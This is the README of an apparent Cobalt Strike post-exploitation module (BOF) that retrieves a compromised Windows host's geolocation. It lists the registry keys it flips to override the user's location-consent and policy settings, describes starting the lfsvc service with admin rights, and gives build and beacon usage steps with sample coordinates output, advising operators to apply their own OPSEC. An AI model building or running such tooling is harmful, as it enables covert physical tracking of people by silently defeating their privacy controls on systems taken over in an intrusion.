A Cobalt Strike BOF that attempts to retrieve Windows geolocation coordinates without fork & run. It uses the WinRT Geolocator API first and falls back to the legacy ILocation API.
Simple BOF that uses WinRT geolocation with a legacy ILocation fallback. Will flip the following registry keys:
HKCU\Software\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\locationValue=Allow
HKCU\Software\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\location\NonPackaged\<encoded process path>Value=Allow
- Admin only:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\locationValue=Allow
- Admin only:
HKLM\SOFTWARE\Policies\Microsoft\Windows\LocationAndSensorsDisableLocation=0DisableWindowsLocationProvider=0
- Admin only:
HKLM\SOFTWARE\Policies\Microsoft\Windows\AppPrivacyLetAppsAccessLocation=1
- Admin only:
HKLM\SYSTEM\CurrentControlSet\Services\lfsvc\Service\ConfigurationStatus=1
Admin execution also temporarily changes the lfsvc service start type to demand start and attempts to start the service.
All changes are undone after execution.
- git clone the repo
- run
make
- import the
GeoLocationBOF.cnascript into Cobalt Strike - use the command
geolocation_bof
beacon> geolocation_bof
[*] Running geolocation_bof by (@codex_tf2)
[+] host called home, sent: 30095 bytes
[+] received output:
latitude=12.34567890
longitude=-12.34567890
accuracy_radius_meters=25.00
- Windows location services must be available on the target.
- Location privacy settings, policy, sensors, and provider availability can prevent results.
- Admin context is required to enable the location permission if not already granted
- Temporary registry changes made to grant location permissions and restored before the BOF exits
- No evasion is performed - apply your own OPSEC
This BOF is meant to provide a direct in-process way to request Windows geolocation data.
usual disclaimer here, I am not responsible for any crimes against humanity you may commit or nuclear war you may cause using this piece of poorly written code.